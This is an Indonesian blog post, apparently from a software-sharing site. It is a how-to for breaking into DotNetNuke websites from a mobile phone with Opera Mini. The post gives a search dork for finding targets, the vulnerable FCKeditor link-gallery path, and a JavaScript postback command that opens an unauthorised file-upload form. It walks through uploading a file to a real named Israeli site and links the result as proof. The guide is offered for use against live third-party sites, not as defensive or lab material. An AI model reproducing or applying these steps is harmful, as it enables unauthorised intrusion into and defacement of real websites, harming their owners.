Hacking Website Melalui Handphone


Hacking Website Melalui Handphone



Mungkin kedengarannya gila bila membaca judul diatas….! ‘it’s imposible


Pada dasarnya aplikasi web browser di HP maupun di PC it cara kerjanya sama,yg membedakan adalah system yg bekerja mendukung applikasi it sendiri (Java, SymBian, Linux, Windows, Android etc). Dan ukuran atau kapasitas serta kemampuan menampilkan web. Tapi pada dasarnya cara kerjanya tetap. Sama, jadi apa yg bisa dilakukan lwt pc,kmgknan bsa jg dikerjakan lwt hape…!
Nah yg coba saya bahas disini adalah exploit web dgn cara hack web melalui DNN (dot net nuke) exploit
melalui hape.

Bahan2 yg kita butuhkan adalah:

1. Operamini browser versi 5.0
2. Operamini browser versi 4.2
Kenapa pake 2 Web Browser ?
Lebih enak pake 2 browser di atas.alasannya adalah:
1. Operamini 5.0 mendukung multi tab jadi cocok buat mencari target dan mengetesnya   tanpa harus open close satu2.
2. Operamini 5.0 mempunyai kemampuan copi paste,pilih text dan lgsg mensearchnya dlm sekali klik ditab yg sama ataupun membukanya di tab baru.
3. Operamini 4.2 respon browser lbh bagus dr yg v 5.0
Setelah cek target dr opmin 5.0 dan ternyata vuln tgl copy kan aja linknya di operamini 4.2 .
Tgl kta exploit lwt situ..
(Operamini 4.2 tdk multi tab,untuk yg multi tab slhkan cari di opera modif di google)
Nah sekarang memasuki langkah2 atau cara2 melakukan hack web dgn DNN exploit melalui opera mini.

Pertama: pastikan anda masih mempunyai saldo pulsa

Kedua: buka operamini v 5.0 anda dan ketik di kolom google search dorknya->
inurl:”/portals/0″  
And search!!…

Nah dapet kan??
Tinggal kita pilh target yang pas di hati.dan kali ini saya coba di situs orang israel.
Taruh cursor di link target trus tekan angka 1 di keypad hape anda.
Pilih open in new tab.

Begitu seterusnya untuk link target yg lain sampai keluar beberapa tab.
Oh,ya untuk mengetahu gimana ,apa dan bagaimana DNN exploit it silahkan baca disini:
http://securityreason.com/exploitalert/6234

Next, misalkan kita dah dpt targetnya nih…
Example site:
http://fril.co.il/portals/0/cwindex.txt
Spti keterangan di securityreason di atas kita coba potong link target dan menggantinya dgn
/Providers/HtmlEditorProviders/ Fck/fcklinkgallery.aspx  
->http://site.com/[path]/portals/0/a.txt

Menjadi

->http://site.com/[path]/Providers/HtmlEditorProviders/ Fck/fcklinkgallery.aspx  
Lakukan it pada smua target yg udah kamu buka pada browser operamini 5.0 km.biar gak bolak balik
copas lagi.

Setelah dapat dan pasti vuln seperti site di bawah ini.
http://fril.co.il//Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

Copy dan pastekan di opera 4.2 kamu.

Nb:Alasannya kenapa pindah browser yaitu pada opera 5.0 di hape saya kurang respon pada perintahupload. Proses upload berjalan tapi file tidak terupload dan begitu di coba di v 4.2 sukses terupload.

Tapi bila di v.5.0 km bisa ya lanjut aja disitu.gak ush pndah applikasi.

Lanjut proses.!
Setelah site target di buka di opmin 4.2
Pilih : file ( select a file on your site)
Tunggu biar loading selesai dan menampilkan 2 kolom:
Kolom 1 biasanya tulisan ‘root’

Kolom 2 berisi macam2 file.

Setelah loading selesai hapus link di addres bar operamini kamu dan ganti dgn script di bawah ini:

javascript:__doPostBack(‘ctlURL $cmdUpload’,”)

Lalu klik ok….
Kolom yg tdnya berisi ‘root’ dan ‘jenis2 file’
Skrg ganti menjadi kolom ‘root’ dan kolom kosong untuk upload file.
Nah skrg tgl km upload tuh file txt yg udah km simpan di hape km.
SUCCESS..! you cAn hacked a web site from mobile phone.
Hasilnya seperti ini http://fril.co.il/portals/0/xadal.txt < 100% lewat handphone
Nb: angka 1 di operamini berfungsi untuk copas,select text and open new tab.
-sekian-


hefsi project lab

0 komentar:

Poskan Komentar

silahkan komentar di sini...
dan terima kasih atas komentar nya...

jika ada broken link atau link download terhapus pusat, harap komentar disini.

Next BACK home

Labels

SOFTWARE (436) multimedia (261) Tips dan Triks (248) Tweaker atau hackingmu (222) Desain dan grapik (128) Bacaan (124) Portable (88) Office (72) VIDEO (65) MUSIC (63) Audio (61) Firewall (60) Anti Virus (54) Ada-ada aja (53) GAME (47) Plugin (46) MOVIE (44) FILM (40) Seputar Dunia (40) PDF (33) Photoshop (33) Ebook (30) MOBILE N GADGET (28) WALLPAPER (27) OS (operating system) (26) Driver (20) Aplikasi hp (14) MAGAZINE (14) MAJALAH (14) Browser (13) 3D (12) Android (9) Barat (9) Game hp (4) Print (4) Brush (2) Hefsilogy (2) Blackberry (1)
 
Copyright © SOFTWARE CENTER
Design by hefsi
DMCA.com